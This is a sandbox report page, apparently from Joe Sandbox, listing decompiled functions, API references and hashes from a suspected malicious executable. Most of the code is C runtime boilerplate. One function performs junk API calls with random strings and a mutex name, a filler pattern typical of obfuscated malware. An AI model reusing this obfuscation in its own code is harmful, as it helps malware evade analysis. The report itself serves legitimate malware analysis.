Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: gM
API String ID: 2579439406-3856490431
Opcode ID: 22cd2121f42a5a192676c60e459d3f0c4396f85efa6c87e8bd0950c11d0feefe
Instruction ID: 56670fa9d14bea033dbee3324f30dc69158157d405a3d1e85005c15a348deb61
Opcode Fuzzy Hash: 22cd2121f42a5a192676c60e459d3f0c4396f85efa6c87e8bd0950c11d0feefe
Instruction Fuzzy Hash: 3721EDB49032048FDB00EF29EA456447BF0FB0C305F02503BF508962A4EBBA5985DF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040485B Relevance: 7.6, APIs: 5, Instructions: 62
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040485B(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				struct _EXCEPTION_POINTERS _v732;
				intOrPtr _v800;
				char _v812;
				CHAR* _v816;
				void* __ebp;
				signed int _t35;
				intOrPtr _t37;
				long _t40;
				char* _t44;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				char _t60;
				signed int _t61;
				void* _t63;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				_t54 = __ebx;
				_t35 =  *0x4a3fb0; // 0x23ecf496
				_v8 = _t35 ^ _t61;
				_push(__esi);
				if(( *0x4a3390 & 0x00000001) != 0) {
					E00407DEB(__edx, 0xa);
					_pop(_t55);
				}
				_t37 = E00408024();
				_t65 = _t37;
				if(_t37 != 0) {
					_t37 = E00408031(_t54, _t58, _t59, _t65);
					_t55 = 0x16;
				}
				if(( *0x4a3390 & 0x00000002) != 0) {
					_v548 = _t37;
					_v552 = _t55;
					_v556 = _t57;
					_v560 = _t54;
					_v564 = _t59;
					_v568 = _t58;
					_v524 = ss;
					_v536 = cs;
					_v572 = ds;
					_v576 = es;
					_v580 = fs;
					_v584 = gs;
					asm("pushfd");
					_pop( *_t18);
					_t60 = _v0;
					_t44 =  &_v0;
					_v528 = _t44;
					_v724 = 0x10001;
					_v540 = _t60;
					_v544 =  *((intOrPtr*)(_t44 - 4));
					E00405EF0(_t58,  &_v812, 0, 0x50);
					_t63 = _t63 + 0xc;
					_v732.ExceptionRecord =  &_v812;
					_v812 = 0x40000015;
					_v800 = _t60;
					_v732.ContextRecord =  &_v724;
					SetUnhandledExceptionFilter(0);
					UnhandledExceptionFilter( &_v732);
				}
				E00407D69(3);
				asm("int3");
				_push(_t61);
				if(DeleteFileA(_v816) != 0) {
					_t40 = 0;
					__eflags = 0;
				} else {
					_t40 = GetLastError();
				}
				if(_t40 == 0) {
					__eflags = 0;
					return 0;
				} else {
					return E00405EC3(_t40) | 0xffffffff;
				}
			}

0x0040485b
0x0040485b
0x0040485b
0x0040485b
0x00404866
0x0040486d
0x00404877
0x00404878
0x0040487c
0x00404881
0x00404881
0x00404882
0x00404887
0x00404889
0x0040488d
0x00404892
0x00404892
0x0040489a
0x004048a0
0x004048a6
0x004048ac
0x004048b2
0x004048b8
0x004048be
0x004048c4
0x004048cb
0x004048d2
0x004048d9
0x004048e0
0x004048e7
0x004048ee
0x004048ef
0x004048f5
0x004048f8
0x004048fb
0x00404901
0x0040490b
0x00404916
0x00404925
0x00404930
0x00404933
0x00404941
0x0040494b
0x00404951
0x00404957
0x00404964
0x00404964
0x0040496c
0x00404971
0x00404974
0x00404982
0x0040498c
0x0040498c
0x00404984
0x00404984
0x00404984
0x00404990
0x0040499e
0x004049a1
0x00404992
0x0040499d
0x0040499d

APIs

__NMSG_WRITE.LIBCMT ref: 0040487C

Part of subcall function 00407DEB: __set_error_mode.LIBCMT ref: 00407E1C
Part of subcall function 00407DEB: __set_error_mode.LIBCMT ref: 00407E2D
Part of subcall function 00407DEB: _strcpy_s.LIBCMT ref: 00407E61
Part of subcall function 00407DEB: __invoke_watson.LIBCMT ref: 00407E72
Part of subcall function 00407DEB: GetModuleFileNameA.KERNEL32(00000000,004D62C9,00000104,00405EA2,00404A65,?,00000000,00000000,?,00403B80,00000000,00000000,00000000), ref: 00407E8E
Part of subcall function 00407DEB: _strcpy_s.LIBCMT ref: 00407EA3
Part of subcall function 00407DEB: __invoke_watson.LIBCMT ref: 00407EB6
Part of subcall function 00407DEB: _strlen.LIBCMT ref: 00407EBF
Part of subcall function 00407DEB: _strlen.LIBCMT ref: 00407ECC
Part of subcall function 00407DEB: __invoke_watson.LIBCMT ref: 00407EF9

_raise.LIBCMT ref: 0040488D
_memset.LIBCMT ref: 00404925
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 00404957
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00404964

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: __invoke_watson$ExceptionFilterUnhandled__set_error_mode_strcpy_s_strlen$FileModuleName_memset_raise
String ID:
API String ID: 4212829890-0
Opcode ID: 5a6c2898b899b9d396a53f63cf920baeecc0b03d6f0103d3691db4e2393ff585
Instruction ID: 7ff16bb37485333af935a517b222a3aa298cd261dbaee475d4f4c26e85bc5adc
Opcode Fuzzy Hash: 5a6c2898b899b9d396a53f63cf920baeecc0b03d6f0103d3691db4e2393ff585
Instruction Fuzzy Hash: 472137B0C0132D9ACB21EF65DC897C9BBB8AF08704F1041EAA50CB6291DB745FC18F48

Uniqueness

Uniqueness Score: -1.00%

Function 0040A05B Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A05B() {

				SetUnhandledExceptionFilter(E0040A019);
				return 0;
			}

0x0040a060
0x0040a068

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A019), ref: 0040A060

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ef23916e98bd095498a9d47698b7afbef6d6e9052eb1ec1fed5f4f296988a7e1
Instruction ID: 85b74c1478bff5dad14a08e12a4d8fa628825288064f1aef421c5eac64b658a8
Opcode Fuzzy Hash: ef23916e98bd095498a9d47698b7afbef6d6e9052eb1ec1fed5f4f296988a7e1
Instruction Fuzzy Hash: B990027025130446DA041F705E1D68625905A9C7467550871A101E84A4DAB54410651A

Uniqueness

Uniqueness Score: -1.00%

Function 0218C71C Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_218b000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction ID: 77cec88a3c4e979e0788f6ba70e1592020f428240f7aad7b001dde80dadf60b5
Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
Instruction Fuzzy Hash: 883199758862819FCB19DE30D8D0AB5BB71EF87224F1995AED0818B106D3355046CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 0218B0A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.304747895.000000000218B000.00000040.00000800.00020000.00000000.sdmp, Offset: 0218B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_218b000_U59WtZz2Sg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: b4ba982376bd7ce28bf1fcd91f9f758d2a229cae029d32c3e7443ac5bae6cd47
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 781170723841019FD754DE55DCC0EA673EAFB89224B198065ED08CB352D775E942CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00405810 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00405810(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x4107c8);
				E004065D4(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E00407AB3(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402200;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x4a33a8;
				E00406B09(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E004058E5();
				E00406B09(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x4a39b0; // 0x4a38d8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E004054CD( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E00406619(E004058EE());
			}

0x00405810
0x00405810
0x00405812
0x00405817
0x0040581c
0x00405822
0x0040582a
0x0040582d
0x00405832
0x00405833
0x00405836
0x00405839
0x00405843
0x00405848
0x00405850
0x00405858
0x00405868
0x00405868
0x0040586e
0x00405871
0x00405878
0x0040587f
0x00405888
0x0040588e
0x00405895
0x0040589b
0x004058a2
0x004058a9
0x004058af
0x004058b2
0x004058b5
0x004058ba
0x004058bc
0x004058c1
0x004058c1
0x004058c7
0x004058cd
0x004058de

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,004107C8,0000000C,0040594B,00000000,00000000,?,00000000,00405EA2,00404A65,?,00000000,00000000,?,00403B80,00000000), ref: 00405822
__crt_waiting_on_module_handle.LIBCMT ref: 0040582D

Part of subcall function 00407AB3: Sleep.KERNEL32(000003E8,00000000,?,00405773,KERNEL32.DLL,?,004057BF,?,00000000,00405EA2,00404A65,?,00000000,00000000,?,00403B80), ref: 00407ABF
Part of subcall function 00407AB3: GetModuleHandleW.KERNEL32(eJ@,?,00405773,KERNEL32.DLL,?,004057BF,?,00000000,00405EA2,00404A65,?,00000000,00000000,?,00403B80,00000000), ref: 00407AC8

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00405856
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00405866
__lock.LIBCMT ref: 00405888
InterlockedIncrement.KERNEL32(?), ref: 00405895
__lock.LIBCMT ref: 004058A9
___addlocaleref.LIBCMT ref: 004058C7

Strings

KERNEL32.DLL, xrefs: 0040581C, 00405821, 0040582C
DecodePointer, xrefs: 0040585E
EncodePointer, xrefs: 0040584A

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 81ccac30a8b30a05aa24dd5084ff0dc6b89eaff430d76fa240db34616d565487
Instruction ID: 5daaab1df907e57dc4cd0dfd9684da6d9cfba8b8cccb66917247b85f6be88bd1
Opcode Fuzzy Hash: 81ccac30a8b30a05aa24dd5084ff0dc6b89eaff430d76fa240db34616d565487
Instruction Fuzzy Hash: 73115171900B419ED710EF66D905B4ABBF4AF01314F10853FE499B66E1DB78A650CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00402F91 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00402F91(intOrPtr _a4, unsigned int _a8, intOrPtr _a12) {
				void* _v6;
				long _v8;
				short _v2056;
				unsigned int _t10;
				void* _t11;
				unsigned int _t21;
				intOrPtr _t23;

				if( *0x4d4524 == 0x516) {
					_v8 = 0;
					asm("stosw");
					ReadConsoleOutputCharacterW(0,  &_v2056, 0, _v8,  &_v8);
				}
				_t10 = _a8 >> 3;
				if(_t10 > 0) {
					_t23 = _a4;
					_t21 = _t10;
					do {
						if( *0x4d4524 == 0xb7d) {
							CopyFileExA("dopuxabokofonatuletayam", "sotidofiwanuniyixupanosojizovoba puralopowixepive", 0, 0, 0, 0);
							__imp__GetConsoleAliasExesLengthA();
						}
						_t30 =  *0x4d4524 - 0x1c;
						if( *0x4d4524 == 0x1c) {
							OpenMutexW(0, 0, L"makelav");
							EnumDateFormatsW(0, 0, 0);
							EnumSystemCodePagesW(0, 0);
						}
						_t11 = E00402EAF(_t30, _t23, _a12);
						_t23 = _t23 + 8;
						_t21 = _t21 - 1;
					} while (_t21 != 0);
					return _t11;
				}
				return _t10;
			}

0x00402fa8
0x00402fac
0x00402fb3
0x00402fc5
0x00402fc5
0x00402fce
0x00402fd3
0x00402fd5
0x00402fd9
0x00402fdb
0x00402fe5
0x00402ff5
0x00402ffb
0x00402ffb
0x00403001
0x00403008
0x00403011
0x0040301a
0x00403022
0x00403022
0x0040302c
0x00403031
0x00403034
0x00403034
0x00000000
0x00403037
0x0040303b

APIs

ReadConsoleOutputCharacterW.KERNEL32(00000000,?,00000000,?,?), ref: 00402FC5
CopyFileExA.KERNEL32(dopuxabokofonatuletayam,sotidofiwanuniyixupanosojizovoba puralopowixepive,00000000,00000000,00000000,00000000), ref: 00402FF5
GetConsoleAliasExesLengthA.KERNEL32 ref: 00402FFB
OpenMutexW.KERNEL32(00000000,00000000,makelav), ref: 00403011
EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040301A
EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00403022

Strings

sotidofiwanuniyixupanosojizovoba puralopowixepive, xrefs: 00402FEB
dopuxabokofonatuletayam, xrefs: 00402FF0
makelav, xrefs: 0040300A

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: ConsoleEnum$AliasCharacterCodeCopyDateExesFileFormatsLengthMutexOpenOutputPagesReadSystem
String ID: dopuxabokofonatuletayam$makelav$sotidofiwanuniyixupanosojizovoba puralopowixepive
API String ID: 1004590084-2677198991
Opcode ID: ea1b13d10456f0a9a191c99c0d1db54b2a2d40eb99461e112fe97142eaf8935f
Instruction ID: 9604507bb500d49890c3b98e60e8d838a5978c2d94888db2679153159832a2d9
Opcode Fuzzy Hash: ea1b13d10456f0a9a191c99c0d1db54b2a2d40eb99461e112fe97142eaf8935f
Instruction Fuzzy Hash: D1114C35502128BBCB219F519E48DDF7FACEF8A3A6B104036F249B25A0D7784A45D7EC

Uniqueness

Uniqueness Score: -1.00%

Function 00406423 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406423() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x4d7c60;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x4d7c60 = _t5;
				}
				_t6 = E0040B014(_t5, 4);
				 *0x4d6c58 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4a3b40;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4a3dc0) {
							break;
						}
						_t6 =  *0x4d6c58; // 0x7720e8
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x4a3b50;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x4d6b20 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x4a3bb0);
					return 0;
				} else {
					 *0x4d7c60 = _t26;
					_t6 = E0040B014(_t26, 4);
					 *0x4d6c58 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x00406423
0x0040642b
0x0040642e
0x00406439
0x0040643b
0x00000000
0x0040643b
0x00406430
0x00406430
0x0040643d
0x0040643d
0x0040643d
0x00406445
0x0040644c
0x00406453
0x00406473
0x00406473
0x00406475
0x00406481
0x00406481
0x00406484
0x00406487
0x00406490
0x00000000
0x00000000
0x0040647c
0x0040647c
0x00406494
0x00406495
0x00406497
0x0040649d
0x004064b1
0x004064b7
0x004064c1
0x004064c1
0x004064c3
0x004064c6
0x004064c7
0x004064d3
0x00406455
0x00406458
0x0040645e
0x00406465
0x0040646c
0x00000000
0x0040646e
0x00406470
0x00406472
0x00406472
0x0040646c

APIs

__calloc_crt.LIBCMT ref: 00406445
__calloc_crt.LIBCMT ref: 0040645E

Strings

P;J, xrefs: 00406497
w, xrefs: 0040644C, 00406465, 0040647C
aM, xrefs: 0040648A
`lM, xrefs: 00406475

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: __calloc_crt
String ID: aM$P;J$`lM$ w
API String ID: 3494438863-2533925420
Opcode ID: 4931f7970e39209cb4c7d938d1cca000670437348bf18ac601d9ba2402701f88
Instruction ID: 3826ad41e4f95feab70118d0e928feb141bfbabd598258a389dcfdc463638217
Opcode Fuzzy Hash: 4931f7970e39209cb4c7d938d1cca000670437348bf18ac601d9ba2402701f88
Instruction Fuzzy Hash: DA1140317162204BE3294F2DBCD4A666391EB95B34B26413BF616E73E0FB38D891865C

Uniqueness

Uniqueness Score: -1.00%

Function 00404EC7 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E00404EC7(void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_push(0xc);
				_push(0x410768);
				E004065D4(_t25, __edi, __esi);
				_t31 = E00405970(_t25, _t29, __edi, _t35);
				_t15 =  *0x4a38cc; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00406B09(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x4a37d0; // 0x771610
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4a33a8;
								if(__eflags != 0) {
									_push(_t33);
									E00404693(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x4a37d0; // 0x771610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x4a37d0; // 0x771610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00404F62();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00407AE3(_t29, _t31, 0x20);
				}
				return E00406619(_t33);
			}

0x00404ec7
0x00404ec7
0x00404ec9
0x00404ece
0x00404ed8
0x00404eda
0x00404ee2
0x00404f03
0x00404f09
0x00404f0d
0x00404f10
0x00404f13
0x00404f19
0x00404f1b
0x00404f1d
0x00404f20
0x00404f26
0x00404f28
0x00404f2a
0x00404f30
0x00404f32
0x00404f33
0x00404f38
0x00404f30
0x00404f28
0x00404f39
0x00404f3e
0x00404f41
0x00404f47
0x00404f4b
0x00404f4b
0x00404f51
0x00404f58
0x00404eea
0x00404eea
0x00404eea
0x00404eef
0x00404ef3
0x00404ef8
0x00404f00

APIs

__getptd.LIBCMT ref: 00404ED3

Part of subcall function 00405970: __getptd_noexit.LIBCMT ref: 00405973
Part of subcall function 00405970: __amsg_exit.LIBCMT ref: 00405980

__amsg_exit.LIBCMT ref: 00404EF3
__lock.LIBCMT ref: 00404F03
InterlockedDecrement.KERNEL32(?), ref: 00404F20
InterlockedIncrement.KERNEL32(00771610), ref: 00404F4B

Memory Dump Source

Source File: 00000000.00000002.304266676.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.304247804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304343600.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304354958.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304463945.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304492582.00000000004D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.304509570.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_U59WtZz2Sg.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1e2d961f7b32adb03d639f416486e2bb4c367f1d88c3b8b0b54ec13d66b723f1
Instruction ID: 2388bd391975e2ff78d20b1b0e3a837d449d11fb6a87227ac112b03804d9407d
Opcode Fuzzy Hash: 1e2d961f7b32adb03d639f416486e2bb4c367f1d88c3b8b0b54ec13d66b723f1
Instruction Fuzzy Hash: 93018EF5A00612ABCB10AF259805B5AB7A0BB85715F01013BFA10B77D1DB7CAA41CFDD

Uniqueness

Uniqueness Score: -1.00%

Function 00404693 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E00404693(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x4106e0);
				_t8 = E004065D4(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00406619(_t8);
				}
				if( *0x4d6c50 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x4d6270, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00405E9D(_t31);
						 *_t10 = E00405E5B(GetLastError());
					}
					goto L9;
				}
				E00406B09(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00406B6C(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00406B9C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E004046E9();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x00404693
0x00404695
0x0040469a
0x0040469f
0x004046a4
0x0040471b
0x00404720
0x00404720
0x004046ad
0x004046f2
0x004046f3
0x004046fb
0x00404701
0x00404703
0x00404705
0x00404718
0x0040471a
0x00000000
0x00404703
0x004046b1
0x004046b7
0x004046bc
0x004046c2
0x004046c7
0x004046c9
0x004046ca
0x004046cb
0x004046d1
0x004046d2
0x004046d9
0x004046e2
0x00000000
0x004046e4
0x004046e4
0x00000000
0x004046e4

APIs

__lock.LIBCMT ref: 004046B1

Part of subcall function 00406B09: __mtinitlocknum.LIBCMT ref: 00406B1F
Part of subcall function 00406B09: __amsg_exit.LIBCMT ref: 00406B2B
Part of subcall function 00406B09: EnterCriticalSection.KERNEL32(5E90BC38,5E90BC38,eJ@,00407A16,00000004,004108A0,0000000C,0040B02A,eJ@,00405EA2,00000000,00000000,00000000,?,00405922,00000001), ref: 00406B33

___sbh_find_block.LIBCMT ref: 004046BC
___sbh_free_block.LIBCMT ref: 004046CB
